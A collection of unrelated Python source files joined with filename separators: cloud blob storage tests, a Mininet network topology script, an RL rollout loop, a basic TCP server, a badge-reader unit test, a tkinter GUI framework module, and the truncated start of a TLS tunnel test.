with ctx:
with bf.BlobFile(path, "rb") as f:
contents = f.read()
assert contents.startswith(AZURE_PUBLIC_URL_HEADER)
def test_scandir_error():
for error, path in [
(None, AZURE_VALID_CONTAINER),
(FileNotFoundError, AZURE_INVALID_CONTAINER),
(FileNotFoundError, AZURE_INVALID_CONTAINER_NO_ACCOUNT),
(bf.Error, f"https://{AS_EXTERNAL_ACCOUNT}.blob.core.windows.net/private"),
]:
ctx = contextlib.nullcontext()
if error is not None:
ctx = pytest.raises(error)
with ctx:
print(path)
list(bf.scandir(path))
def test_windowed_file():
with _get_temp_local_path() as path:
with open(path, "wb") as f:
f.write(b"meow")
with open(path, "rb") as f:
f2 = common.WindowedFile(f, start=1, end=3)
assert f2.read() == b"eo"
f2.seek(0)
assert f2.read(1) + f2.read(1) + f2.read(1) == b"eo"
with pytest.raises(AssertionError):
f2.seek(-1)
with pytest.raises(AssertionError):
f2.seek(2)
def test_pickle_config():
ctx = ops.create_context()
c = ctx._conf
pickle.dumps(c)
c.get_http_pool()
c2 = pickle.loads(pickle.dumps(c))
c2.get_http_pool()
@pytest.mark.parametrize("ctx", [_get_temp_gcs_path, _get_temp_as_path])
def test_read_with_size(ctx):
contents = b"meow!\npurr\n"
with ctx() as path:
path = bf.join(path, "a folder", "a.file")
bf.makedirs(bf.dirname(path))
with bf.BlobFile(path, "wb") as w:
w.write(contents)
with bf.BlobFile(path, "rb", file_size=1) as r:
assert r.read() == contents[:1]
assert r.tell() == 1
|
new1.py
|
from mininet.net import Mininet
from mininet.topo import Topo
from mininet.util import dumpNodeConnections
from mininet.log import setLogLevel
from mininet.cli import CLI
import threading, time, socket, logging, sys
#tree4 = TreeTopo(depth=2, fanout=2)
##net = Mininet(topo=tree4)
#net.start()
#h1, h4 = net.hosts[0], net.hosts[3]
#print(h1.cmd('ping -c1 %s' % h4.IP()))
#net.stop()
logging.basicConfig(level=logging.DEBUG,
format='%(name)s: %(message)s',
)
class SingleSwitchTopo(Topo):
def build(self, n=2):
self.addSwitch('s1')
self.addSwitch('s2')
self.addSwitch('s3')
self.addLink('s1','s2')
self.addLink('s1','s3')
self.addSwitch('s4')
self.addSwitch('s5')
self.addSwitch('s6')
self.addSwitch('s7')
self.addLink('s2','s4')
self.addLink('s2','s5')
self.addLink('s3','s6')
self.addLink('s3','s7')
self.addHost('h1')
self.addHost('h2')
self.addHost('h3')
self.addHost('h4')
self.addHost('h5')
self.addHost('h6')
self.addHost('h7')
self.addHost('h8')
self.addLink('s4', 'h1')
self.addLink('s4', 'h2')
self.addLink('s5', 'h3')
self.addLink('s5', 'h4')
self.addLink('s6', 'h5')
self.addLink('s6', 'h6')
self.addLink('s7', 'h7')
self.addLink('s7', 'h8')
#switch = self.addSwitch('s')
#for h in range(n):
# host = self.addHost('h%s' % (h+1))
# self.addLink(host, switch)
# print('added link')
def simpleTest():
topo1 = SingleSwitchTopo(n=2)
net = Mininet(topo1)
net.start()
print("Dumping")
dumpNodeConnections(net.hosts)
print("Testing")
net.pingAll()
global h1
global h2
print('get h1')
h1 = net.get('h1')
print('get h2')
h2 = net.get('h2')
thread1 = threading.Thread(target=startH1)
thread2 = threading.Thread(target=startH2)
thread1.start()
thread2.start()
#print h1.cmd('python myServer.py', h1.IP())
#print h2.cmd('python myClient.py', h1.IP())
#p1 = h1.popen('python myServer.py &')
CLI(net)
#p1.terminate()
net.stop()
def startH1():
print("doing startH1")
h1.cmd('python myServer.py')
def startH2():
h2.cmd('python myClient.py')
if __name__ == '__main__':
#setLogLevel('info')
simpleTest()
# address = ('localhost', 0) # let the kernel give us a port
# server = EchoServer(address, EchoRequestHandler)
# ip, port = server.server_address # find out what port we were given
# t = threading.Thread(target=server.serve_forever)
# t.setDaemon(True) # don't hang on exit
# t.start()
# logger = logging.getLogger('client')
# logger.info('Server on %s:%s', ip, port)
# Connect to the server
# logger.debug('creating socket')
# s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# logger.debug('connecting to server')
# s.connect((ip, port))
# Send the data
# message = 'Hello, world'
# logger.debug('sending data: "%s"', message)
# len_sent = s.send(message)
# Receive a response
# logger.debug('waiting for response')
# response = s.recv(len_sent)
# logger.debug('response from server: "%s"', response)
# Clean up
# logger.debug('closing socket')
# s.close()
# logger.debug('done')
# server.socket.close()
|
loop.py
|
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import annotations
import abc
import asyncio
import logging
import time
from typing import Dict, List, NoReturn, Optional, Sequence, Union
import torch
import torch.multiprocessing as mp
import moolib
import rlmeta.core.remote as remote
import rlmeta.utils.asycio_utils as asycio_utils
import rlmeta.utils.moolib_utils as moolib_utils
from rlmeta.agents.agent import Agent, AgentFactory
from rlmeta.core.controller import Controller, ControllerLike, Phase
from rlmeta.core.launchable import Launchable
from rlmeta.envs.env import Env, EnvFactory
class Loop(abc.ABC):
@abc.abstractmethod
def run(self, num_episodes: Optional[int] = None) -> None:
"""
"""
class AsyncLoop(Loop, Launchable):
def __init__(self,
env_factory: EnvFactory,
agent_factory: AgentFactory,
controller: ControllerLike,
running_phase: Phase,
should_update: bool = False,
num_rollouts: int = 1,
index: int = 0,
index_offset: Optional[int] = None,
seed: Optional[int] = None) -> None:
self._running_phase = running_phase
self._should_update = should_update
self._index = index
self._num_rollouts = num_rollouts
if index_offset is None:
self._index_offset = index * num_rollouts
else:
self._index_offset = index_offset
self._seed = seed
self._env_factory = env_factory
self._agent_factory = agent_factory
self._envs = []
self._agents = []
self._controller = controller
self._loop = None
self._tasks = []
self._running = False
@property
def running_phase(self) -> Phase:
return self._running_phase
@property
def should_update(self) -> bool:
return self._should_update
@property
def num_rollouts(self) -> int:
return self._num_rollouts
@property
def index(self) -> int:
return self._index
@property
def index_offset(self) -> int:
return self._index_offset
@property
def seed(self) -> Optional[int]:
return self._seed
@property
def running(self) -> bool:
return self._running
@running.setter
def running(self, running: bool) -> None:
self._running = running
def init_launching(self) -> None:
pass
def init_execution(self) -> None:
for obj_name in dir(self):
obj = getattr(self, obj_name)
if isinstance(obj, remote.Remote):
obj.name = moolib_utils.expend_name_by_index(
obj.name, self.index)
obj.connect()
for obj_name in dir(self):
obj = getattr(self, obj_name)
if isinstance(obj, Launchable):
obj.init_execution()
for i in range(self._num_rollouts):
env = self._env_factory(self.index_offset + i)
if self.seed is not None:
env.seed(self.seed + self.index_offset + i)
self._envs.append(env)
for i in range(self._num_rollouts):
agent = self._agent_factory(self.index_offset + i)
agent.connect()
# if self.seed is not None:
# agent.seed(self.seed + self.index_offset + i)
self._agents.append(agent)
def run(self) -> NoReturn:
self._loop = asyncio.get_event_loop()
self._tasks.append(
asycio_utils.create_task(self._loop, self._check_phase()))
for i, (env, agent) in enumerate(zip(self._envs, self._agents)):
task = asycio_utils.create_task(
self._loop, self._run_loop(env, agent, self.index_offset + i))
self._tasks.append(task)
try:
self._loop.run_forever()
except Exception as e:
logging.error(e)
raise e
finally:
for task in self._tasks:
task.cancel()
self._loop.stop()
async def _check_phase(self) -> NoReturn:
while True:
cur_phase = await self._controller.async_get_phase()
self._running = (cur_phase == self.running_phase)
await asyncio.sleep(1)
async def _run_loop(self,
env: Env,
agent: Agent,
index: int = 0) -> NoReturn:
while True:
while not self.running:
await asyncio.sleep(1)
stats = await self._run_episode(env, agent, index)
if stats is not None:
await self._controller.async_add_episode(stats)
# Similar loop as DeepMind's Acme
# https://github.com/deepmind/acme/blob/master/acme/environment_loop.py#L68
async def _run_episode(self,
env: Env,
agent: Agent,
index: int = 0) -> Optional[Dict[str, float]]:
episode_length = 0
episode_return = 0.0
start_time = time.perf_counter()
timestep = env.reset()
await agent.async_observe_init(timestep)
while not timestep.done:
if not self.running:
return None
action = await agent.async_act(timestep)
timestep = env.step(action)
await agent.async_observe(action, timestep)
if self.should_update:
await agent.async_update()
episode_length += 1
episode_return += timestep.reward
episode_time = time.perf_counter() - start_time
steps_per_second = episode_length / episode_time
return {
"episode_length": float(episode_length),
"episode_return": episode_return,
"episode_time/s": episode_time,
"steps_per_second": steps_per_second,
}
class ParallelLoop(Loop):
def __init__(self,
env_factory: EnvFactory,
agent_factory: AgentFactory,
controller: Union[Controller, remote.Remote],
running_phase: Phase,
should_update: bool = False,
num_rollouts: int = 1,
num_workers: Optional[int] = None,
index: int = 0,
index_offset: Optional[int] = None,
seed: Optional[int] = None) -> None:
self._running_phase = running_phase
self._should_update = should_update
self._index = index
self._num_rollouts = num_rollouts
self._num_workers = min(mp.cpu_count(), self._num_rollouts)
if num_workers is not None:
self._num_workers = min(self._num_workers, num_workers)
if index_offset is None:
self._index_offset = index * num_rollouts
else:
self._index_offset = index_offset
self._seed = seed
self._env_factory = env_factory
self._agent_factory = agent_factory
self._controller = controller
self._workloads = self._compute_workloads()
self._async_loops = []
self._processes = []
index_offset = self._index_offset
for i, workload in enumerate(self._workloads):
loop = AsyncLoop(self._env_factory, self._agent_factory,
self._controller, self.running_phase,
self.should_update, workload, i, index_offset,
self.seed)
self._async_loops.append(loop)
index_offset += workload
@property
def running_phase(self) -> Phase:
return self._running_phase
@property
def should_update(self) -> bool:
return self._should_update
@property
def num_rollouts(self) -> int:
return self._num_rollouts
@property
def num_workers(self) -> int:
return self._num_workers
@property
def index(self) -> int:
return self._index
@property
def index_offset(self) -> int:
return self._index_offset
@property
def seed(self) -> Optional[int]:
return self._seed
def run(self) -> NoReturn:
processes = []
for loop in self._async_loops:
loop.init_launching()
process = mp.Process(target=self._run_async_loop, args=(loop,))
processes.append(process)
for process in processes:
process.start()
self._processes = processes
def start(self) -> None:
self.run()
def join(self) -> None:
for process in self._processes:
process.join()
def terminate(self) -> None:
for process in self._processes:
process.terminate()
def _compute_workloads(self) -> List[int]:
workload = self.num_rollouts // self.num_workers
r = self.num_rollouts % self.num_workers
workloads = [workload + 1] * r + [workload] * (self.num_workers - r)
return workloads
def _run_async_loop(self, loop: AsyncLoop) -> NoReturn:
if loop.seed is not None:
torch.manual_seed(loop.seed + loop.index_offset)
loop.init_execution()
loop.run()
class LoopList:
def __init__(self, loops: Optional[Sequence[Loop]] = None) -> None:
self._loops = []
if loops is not None:
self._loops.extend(loops)
@property
def loops(self) -> List[Loop]:
return self._loops
def append(self, loop: Loop) -> None:
self.loops.append(loop)
def extend(self, loops: Union[LoopList, Sequence[Loop]]) -> None:
if isinstance(loops, LoopList):
self.loops.extend(loops.loops)
else:
self.loops.extend(loops)
def start(self) -> None:
for loop in self.loops:
loop.start()
def join(self) -> None:
for loop in self.loops:
loop.join()
def terminate(self) -> None:
for loop in self.loops:
loop.terminate()
LoopLike = Union[Loop, LoopList]
|
simple_tcp_server.py
|
#!/usr/bin/env python3
import socket
import threading
# this is our client-handling thread
def handle_client(client_socket):
# print out what the client sends
request = client_socket.recv(1024)
print "[*] Received: %s" % request
# send back a packet
client_socket.send("ACK!")
client_socket.close()
bind_ip = "0.0.0.0"
bind_port = 9999
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((bind_ip,bind_port))
server.listen(5)
print "[*] Listening on %s:%d" % (bind_ip,bind_port)
while True:
client,addr = server.accept()
print "[*] Accepted connection from: %s:%d" % (addr[0],addr[1])
# spin up our client thread to handle incoming data
client_handler = threading.Thread(target=handle_client,args=(client,))
client_handler.start()
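# Quick manual check (illustrative, not part of the original script): from another shell,
# connect and read back the ACK, e.g.
#   python3 -c "import socket; s = socket.create_connection(('127.0.0.1', 9999)); s.send(b'hi'); print(s.recv(4096))"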
|
test_badgereader_wiegand_gpio.py
|
# Copyright 2018 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for authbox.badgereader_wiegand_gpio"""
import threading
import time
import unittest
import authbox.badgereader_wiegand_gpio
from authbox import fake_gpio_for_testing
from authbox.compat import queue
from RPi import GPIO
class BadgereaderWiegandGPIOTest(unittest.TestCase):
def setUp(self):
self.fake = fake_gpio_for_testing.FakeGPIO()
self.q = queue.Queue()
self.b = authbox.badgereader_wiegand_gpio.WiegandGPIOReader(
self.q, "b", "0", "1", on_scan=self.on_scan,
)
def on_scan(self, badge_number):
pass
def test_simple_scan(self):
self.fake.press(1, GPIO.FALLING)
self.fake.press(0, GPIO.FALLING)
self.b.run_inner()
self.assertEqual(self.q.get(block=False), (self.on_scan, "10"))
def test_blocks_until_scan(self):
def add_bits_later():
time.sleep(0.2)
self.fake.press(1, GPIO.FALLING)
self.fake.press(0, GPIO.FALLING)
t = threading.Thread(target=add_bits_later)
t.start()
self.b.run_inner()
self.assertEqual(self.q.get(block=False), (self.on_scan, "10"))
def test_limited_queue_size(self):
for i in range(500):
self.fake.press(0, GPIO.FALLING)
self.b.run_inner()
self.assertEqual(self.q.get(block=False), (self.on_scan, "0" * 100))
# Make sure that state is reset.
self.assertTrue(self.b.bitqueue.empty())
|
master_classes.py
|
'''
Python module containing "Master" classes of easy_gui project.
The classes in here are designed to be subclassed in user applications.
'''
import tkinter as tk
import tkinter.scrolledtext
from tkinter import ttk
from tkinter import _tkinter
from .styles import BaseStyle
from . import widgets
import os
import sys
import threading
import traceback
from typing import List, Dict
def recreate_if_needed(func):
'''
Decorator used to enable addition of Sections or Widgets after GUI has been created.
(that is, can add elements outside of EasyGUI subclass' __init__ method)
'''
def inner(*args, **kwargs):
self = args[0]
value = func(*args, **kwargs)
if self.root.created:
self.root.create() # need to re-create GUI so that the new elements show up!
return value
return inner
class GridMaster():
def __init__(self):
self.grid_areas = {}
self.grid_configuration = []
    def configure_grid(self, grid_configuration: List[str]) -> None:
'''
Specify full-window layout with CSS grid-template-area style list of strings.
- Each item in provided grid_configuration corresponds to a grid row and spaces
delimit each cell.
- Individual cells or rectangular groups of contiguous cells may be indicated by name
while unnamed cells are specified by one or more periods.
'''
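        # Illustrative layout (hypothetical area names, per the docstring above): a 2x2 grid
        # where "top" spans both columns and the lower-right cell is left unnamed:
        #     self.configure_grid(['top  top',
        #                          'left .  '])
        # resulting self.grid_areas:
        #     {'top':  {'first_row': 0, 'last_row': 0, 'first_column': 0, 'last_column': 1},
        #      'left': {'first_row': 1, 'last_row': 1, 'first_column': 0, 'last_column': 0}}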
self.grid_configuration = grid_configuration
self.grid_rows = len(grid_configuration)
self.grid_columns = len(grid_configuration[0].split())
for row in grid_configuration:
            if len(row.split()) != self.grid_columns:
print('ERROR! Differing number of grid columns specified below:')
print(grid_configuration)
return
names = set(cell for row in grid_configuration for cell in row.split() if '.' not in cell)
for name in names:
first_row, last_row, first_column, last_column = None, None, None, None
for i, row in enumerate(grid_configuration):
if name in row.split():
if first_row is None:
first_row = i # will stay fixed at the first row containing name
last_row = i # will continue to increase for multiple rows
if first_column is None:
row_list = row.split()
first_column = row_list.index(name) # get far left column of name
last_column = len(row_list) - row_list[::-1].index(name) - 1 # reverse to get far right column
self.grid_areas[name] = {'first_row': first_row, 'last_row': last_row,
'first_column': first_column, 'last_column': last_column}
# Now make elements expand evenly with window resize by default
if self.grid_areas != {}:
limits = self.grid_limits()
for row in range(limits['min_row'], limits['max_row'] + 1):
self.grid_rowconfigure(row, weight=1, minsize=10)
for col in range(limits['min_col'], limits['max_col'] + 1):
self.grid_columnconfigure(col, weight=1, minsize=10)
def add_grid_row(self, row_name: str):
if self.grid_configuration == []:
self.grid_configuration = [row_name]
else:
num_columns = len(self.grid_configuration[0].split(' '))
self.grid_configuration.append(' '.join([row_name] * num_columns))
self.configure_grid(self.grid_configuration)
def grid_limits(self) -> dict:
min_row, max_row, min_col, max_col = 500, -500, 500, -500 # arbitrarily large starting points so no risk of surprising row/col not being captured
for area in self.grid_areas.values():
if area['first_row'] < min_row:
min_row = area['first_row']
if area['last_row'] > max_row:
max_row = area['last_row']
if area['first_column'] < min_col:
min_col = area['first_column']
if area['last_column'] > max_col:
max_col = area['last_column']
return {'min_row': min_row, 'max_row': max_row, 'min_col': min_col, 'max_col': max_col}
class SectionMaster():
def __init__(self):
self.sections: dict = {}
self.widgets: dict = {}
@recreate_if_needed
def add_section(self, name='', title=False, grid_area=None,
borderwidth=None, relief=None, tabbed: bool=False, equal_button_width: bool=False, external_section=None):
'''
Add a Section object to the parent (root window or other Section).
'''
        if external_section:  # if an externally-built section is passed in
if not name:
name = external_section.__name__
section = external_section(parent=self, name=name, title=title, grid_area=grid_area,
borderwidth=borderwidth, relief=relief, tabbed=tabbed, equal_button_width=equal_button_width)
else:
if name == '':
name = f'section{len(self.sections) + 1}'
if name in self.sections:
raise ValueError('Unable to add section as a section with the given name already exists!')
if borderwidth is None:
borderwidth = self.style.borderwidth
if relief is None:
relief = self.style.section_border
# Next 2 lines set grid_area to be name if not explicitly declared and not already used as a grid_area
if grid_area is None and name not in [s.grid_area for s in self.sections.values()]:
grid_area = name
section = Section(parent=self, name=name, title=title, grid_area=grid_area,
borderwidth=borderwidth, relief=relief, tabbed=tabbed, equal_button_width=equal_button_width)
self.sections[name] = section
return section
@recreate_if_needed
def add_widget(self, type='label', text='', widget_name=None, grid_area=None, **kwargs):
'''
Add a Widget object to this Section by calling the add_widget function in widgets.py
(Easier to keep the function there as it needs access to all the individual Widget classes.)
'''
return widgets.add_widget(self, type=type, text=text, widget_name=widget_name, grid_area=grid_area, **kwargs)
def delete_widget(self, widget_name) -> None:
'''
Fully delete a widget.
Pass without issue if the widget doesn't exist.
'''
try:
self.widgets[widget_name].destroy()
del self.widgets[widget_name]
except:
pass
def delete_all_widgets(self) -> None:
'''
Fully delete all child widgets of this section.
'''
for w_name in list(self.widgets.keys()):
self.delete_widget(w_name)
def _clear_and_recreate_plot(self, mpl_figure, widget_name, grid_area, kwargs):
old_widget = self.widgets[widget_name] # grab reference to widget to be deleted so that its place in dict can be given to new widget
new_widget = self.add_widget(type='matplotlib', widget_name=widget_name, toolbar=old_widget.toolbar, grid_area=grid_area)
new_widget.bindings = old_widget.bindings
new_widget.small_figure_warning_given = old_widget.small_figure_warning_given
new_widget.position()
new_widget.draw_plot(mpl_figure=mpl_figure)
new_widget.position() # have to reposition/create Widget
old_widget.destroy() # destroy after new widget is positioned for slightly less flickering
@recreate_if_needed
def add_tab(self, name='', **kwargs):
if not self.tabbed:
print('Error! Cannot .add_tab to a Section unless tabbed=True when it is created.')
return
section = Section(parent=self.tabs, name=name, **kwargs)
self.sections[name] = section
self.tabs.add(section, text=name)
return section
def delete_section(self, section_name) -> None:
'''
Fully delete a section and all of its child widgets.
Pass without issue if the section doesn't exist.
'''
try:
for key, widget in self.sections[section_name].widgets.items():
widget._widget.destroy()
self.sections[section_name].destroy()
del self.sections[section_name]
except:
pass
class EasyGUI(tk.Tk, GridMaster, SectionMaster):
'''
Main class to be subclassed for full GUI window.
'''
style = BaseStyle()
def __init__(self, alpha: float=1.0, topmost: bool=False, disable_interaction: bool=False, toolwindow: bool=False, fullscreen: bool=False, overrideredirect: bool=False, **kwargs) -> None:
super().__init__()
GridMaster.__init__(self)
SectionMaster.__init__(self)
EasyGUI.style.create_font() # have to generate font.Font object after initial tk root window is created
self.key_log = [] # record keys/buttons triggered
self.key_triggers = [('closegui', lambda: self.close())]
self.icon(bitmap=os.path.join(os.path.dirname(__file__), 'resources', 'transparent.ico'), default=True)
self.title('EasyGUI')
self.geometry("300x180+100+60") # format of "WIDTHxHEIGHT+(-)XPOSITION+(-)YPOSITION"
self.transparent = False
self.configure(background=self.style.window_color)
if self.style.transparent:
self.wm_attributes('-transparentcolor', 'white') # turn off window shadow
        # See documentation of the WINDOWS-specific options below here: https://wiki.tcl-lang.org/page/wm+attributes
self.wm_attributes('-alpha', alpha)
self.wm_attributes('-fullscreen', fullscreen)
self.wm_attributes('-disabled', disable_interaction) # disables window interaction for click pass through
self.wm_attributes('-toolwindow', toolwindow) # makes a window with a single close-button (which is smaller than usual) on the right of the title bar
self.wm_attributes('-topmost', topmost) # make root window always on top
self.overrideredirect(overrideredirect) # hide root window drag bar and close button
s = ttk.Style()
s.configure('.', background=self.style.widget_bg_color)
s.configure('.', font=self.style.font)
s.configure('.', foreground=self.style.text_color)
self.created = False
def __init_subclass__(cls, **kwargs):
'''
Wraps user subclass __init__ to implicitly handle the EasyGUI.__init__ call along with
calling .create() after application is fully defined in subclass __init__ method
'''
old_init = cls.__init__ # reference to original subclass method so new_init isn't recursive
def new_init(self, *args, **kwargs):
EasyGUI.__init__(self, **kwargs) # in place of super().__init__() in subclass __init__
try:
old_init(self, *args, **kwargs)
except TypeError:
print('\n* Are you passing in kwargs to GUI creation?\n* If so, remember to put a "**kwargs" in the __init__ function!\n')
traceback.print_exc()
self.create() # populates GUI elements
self.bind_all('<Key>', self.log_keys)
self.mainloop() # runs tkinter mainloop
cls.__init__ = new_init # overwrite subclass __init__ method
@property
def root(self):
'''Used by downstream elements to reference EasyGUI as root'''
return self
def log_keys(self, event):
'''
Record key presses up to a maximum of 100 characters.
Also check to see if any triggers are met and execute as needed.
'''
self.key_log.append(event.char)
self.key_log = self.key_log[-100:]
self.check_key_triggers()
def check_key_triggers(self):
'''
Check if a key trigger has been met,
run function if so, and clear out key log.
(so next key doesn't trigger same result)
'''
key_str = ''.join(self.key_log)
for trigger, action in self.key_triggers:
if trigger in key_str:
self.key_log = []
action()
break
def add_key_trigger(self, trigger, func, separate_thread: bool=False):
'''
Bind a function to a sequence of key presses.
Can specify as separate_thread=True for long-running functions.
'''
if separate_thread:
def threaded_func(*args):
threading.Thread(target=func).start()
self.key_triggers.append((trigger, threaded_func))
else:
self.key_triggers.append((trigger, func))
def close(self):
'''
Alias for self.destroy.
Can be used by any GUI element to close the window via "self.root.close()"
since self.root will travel upstream until it hits EasyGUI.close().
'''
self.destroy()
def icon(self, bitmap, default: bool=False) -> None:
'''
Alternate method to call tk.Tk iconbitmap method using altered path handling
so that PyInstaller can package application with specified .ico file.
If not default, warning message is printed on failing to locate .ico file.
'''
try:
super().iconbitmap(bitmap=resource_path(bitmap))
except _tkinter.TclError:
if default:
                pass  # pass silently if the default .ico is missing; this happens when using PyInstaller without adding transparent.ico to "datas"
else:
print(f'Cannot locate {bitmap}! If using PyInstaller, be sure to specify this file in "datas".')
def create(self, force_row=False) -> None:
'''
Positions GUI elements in window.
May be called recursively by child Sections as elements are positioned.
'''
for child in {**self.widgets, **self.sections}.values():
try:
child.create(force_row) # if child is another Section object
except AttributeError:
child.position(force_row) # if child is a Widget object
self.created = True
def add_menu(self,
commands={'File': lambda: print('File button'), 'Edit': lambda: print('Edit button')},
cascades={'Options': {'Option 1': lambda: print('Option 1'), 'Option 2': lambda: print('Option 2')}}) -> None:
'''
Add a Menu to the top of the root window.
'''
self.menu = tk.Menu(self)
for label, cmd in commands.items():
self.menu.add_command(label=label, command=cmd)
for cascade, c_commands in cascades.items():
cascade_menu = tk.Menu(self.menu, tearoff=0)
for label, cmd in c_commands.items():
cascade_menu.add_command(label=label, command=cmd)
self.menu.add_cascade(label=cascade, menu=cascade_menu)
self.config(menu=self.menu)
def __repr__(self):
return 'Main EasyGUI Application'
def popup(self, *args, **kwargs):
'''
Returns a context manager for generating a popup window. Example usage:
with self.popup() as popup:
popup.add_widget('lbl', 'Test1')
popup.add_widget('btn', 'Test Button', command_func=lambda *args: print('Test Button clicked'))
'''
return PopUp(*args, **kwargs)
class PopUp(tk.Toplevel, GridMaster, SectionMaster):
'''
Basically a mini EasyGUI class that inherits from tk.Toplevel instead of tk.Tk.
Re-implements basic methods of EasyGUI class so widgets can be added.
'''
def __init__(self, *args, width: int=300, height: int=180, x: int=120, y: int=80, **kwargs):
if kwargs.get('tooltip', False):
super().__init__()
GridMaster.__init__(self)
SectionMaster.__init__(self)
self.wm_attributes('-disabled', True) # disables window interaction for click pass through
            self.wm_overrideredirect(True)  # removes the window title bar and border
self.wm_attributes('-alpha', 0.8)
self.geometry(f'{width}x{height}+{x}+{y}') # format of "WIDTHxHEIGHT+(-)XPOSITION+(-)YPOSITION"
self.style = EasyGUI.style
self.style.create_font()
self.configure(bg=self.style.tooltip_color)
else:
super().__init__()
GridMaster.__init__(self)
SectionMaster.__init__(self)
self.icon(bitmap=os.path.join(os.path.dirname(__file__), 'resources', 'transparent.ico'), default=True)
self.geometry(f'{width}x{height}+{x}+{y}') # format of "WIDTHxHEIGHT+(-)XPOSITION+(-)YPOSITION"
self.style = EasyGUI.style
self.style.create_font()
def __enter__(self):
self.created = False
return self
def __exit__(self, *args):
self.create()
@property
def root(self):
'''Used by downstream elements to reference EasyGUI as root'''
return self
def icon(self, bitmap, default: bool=False) -> None:
'''
Alternate method to call tk.Tk iconbitmap method using altered path handling
so that PyInstaller can package application with specified .ico file.
If not default, warning message is printed on failing to locate .ico file.
'''
try:
super().iconbitmap(bitmap=resource_path(bitmap))
except _tkinter.TclError:
if default:
                pass  # pass silently if the default .ico is missing; this happens when using PyInstaller without adding transparent.ico to "datas"
else:
print(f'Cannot locate {bitmap}! If using PyInstaller, be sure to specify this file in "datas".')
def create(self, force_row=False) -> None:
'''Copied from EasyGUI.create'''
for name, section in self.sections.items():
section.create(force_row=force_row)
self.created = True
@recreate_if_needed
def add_widget(self, *args, **kwargs):
'''Copied from EasyGUI.add_widget'''
if '_default' not in self.sections:
self.add_section('_default')
return self.sections['_default'].add_widget(*args, **kwargs)
def __repr__(self):
return 'EasyGUI PopUp Window'
class Section(tk.Frame, GridMaster, SectionMaster):
'''
A Section is a tk.Frame used for storing and managing widgets.
Sections exist as children of the root (EasyGUI) window or other Sections.
'''
def __init__(self, parent=None, name='', title=False, grid_area=None,
tabbed: bool=False, equal_button_width: bool=False, **kwargs) -> None:
borderwidth = kwargs.get('borderwidth', 1)
relief = kwargs.get('relief', 'ridge')
if relief != 'ridge' and not borderwidth:
borderwidth = 1
self.tabbed = tabbed
super().__init__(master=parent,
bg=EasyGUI.style.section_color,
padx=EasyGUI.style.frame_padx,
pady=EasyGUI.style.frame_pady,
borderwidth=borderwidth,
relief=relief)
GridMaster.__init__(self)
SectionMaster.__init__(self)
self.parent = parent
self.name = name
self.grid_area = grid_area
if tabbed:
self.tabs = ttk.Notebook(self)
self.tabs.style = self.style
self.tabs.root = self.root
self.equal_button_width = equal_button_width
if title: # title kwargs can be provided as True or a string
if isinstance(title, str): # if string, use title for label text
self.add_widget(type='label', text=title)
elif title == True: # if True, use the name as the label text
self.add_widget(type='label', text=name)
@property
def style(self):
        '''Goes upstream to eventually reference EasyGUI.style'''
return self.parent.style
@property
def root(self):
        '''Goes upstream to eventually reference EasyGUI as root'''
return self.parent.root
def create(self, force_row: bool=False):
'''
Positions this section within the parent along with
positioning all children (Sections and/or Widgets).
'''
self.position(force_row)
if self.equal_button_width:
self.match_child_button_widths()
for child in {**self.widgets, **self.sections}.values():
try:
child.create(force_row) # if child is another Section object
except AttributeError:
child.position(force_row) # if child is a Widget object
def match_child_button_widths(self):
child_buttons = [child for child in self.widgets.values() if isinstance(child, widgets.Button)]
if len(child_buttons) > 1:
max_width = int(round(max(child.width / 7.0 for child in child_buttons if not child.image)))
for child in child_buttons:
if not child.image:
child.config(width=max_width)
def position(self, force_row: bool=False) -> None:
'''
Physically position this Section within its parent container.
'''
try:
if hasattr(self.parent, 'grid_areas'):
if self.parent.grid_areas != {} and self.grid_area and not force_row:
try:
if not hasattr(self.parent, 'tabbed') or not self.parent.tabbed:
bounds = self.parent.grid_areas[self.grid_area]
self.grid(row=bounds['first_row'], column=bounds['first_column'], rowspan=bounds['last_row']-bounds['first_row']+1, columnspan=bounds['last_column']-bounds['first_column']+1, sticky='NSEW')
else:
self.pack()
if self.tabbed:
self.tabs.pack()
return # early return if everything works fine with initial attempt (no other actions needed)
except KeyError:
                        if self.grid_area != self.name:  # i.e. the user explicitly specified grid_area (name and grid_area match when set programmatically)
print(f'"{self.grid_area}" not found in parent\'s grid areas.\nResorting to a new row.')
self.parent.add_grid_row(self.name)
self.grid_area = self.name
self.parent.create()
except _tkinter.TclError:
print(f'\n--- GRID FAILED for Section: "{self.name}" ---\nTry ensuring "grid_area" arg is given for all Sections in a given parent.\nAdding to a new row instead.')
self.parent.create(force_row=True) # go back and fully recreate section forcing all children to be packed/in new rows
@property
def width(self) -> float:
'''
Estimate and return width desired by this Section.
'''
return float(max(widget.width for widget in self.widgets.values()))
@property
def height(self) -> float:
'''
Estimate and return height desired by this Section.
'''
return float(sum(widget.height for widget in self.widgets.values()))
def __repr__(self) -> str:
return f'Section: "{self.name}"'
def resource_path(relative_path):
'''Get absolute path to resource to allow PyInstaller bundling.'''
try:
base_path = sys._MEIPASS # PyInstaller-created temporary folder
    except AttributeError:  # sys._MEIPASS is only set when running under PyInstaller
base_path = os.path.abspath('.')
return os.path.join(base_path, relative_path)
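# Illustrative user-side sketch (hypothetical app; shown as comments so importing this
# module stays side-effect free). A user subclasses EasyGUI, lays out the window in
# __init__, and __init_subclass__ takes care of calling EasyGUI.__init__, create() and
# mainloop():
#
#     class DemoGUI(EasyGUI):
#         def __init__(self, **kwargs):
#             self.configure_grid(['top',
#                                  'bottom'])
#             top = self.add_section('top')
#             top.add_widget(type='label', text='Hello from easy_gui')
#             bottom = self.add_section('bottom')
#             bottom.add_widget(type='btn', text='Close',
#                               command_func=lambda *args: self.close())
#
#     DemoGUI()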
|
test-client-concurrent-connections.py
|
#!/usr/bin/env python3
# Creates a ghostunnel. Ensures that multiple servers can communicate.
from subprocess import Popen
from multiprocessing import Process
from common import *
import socket, ssl, time, random
def send_data(i, p):
counter = 0
while counter < 100:
r = random.random()
if r < 0.4:
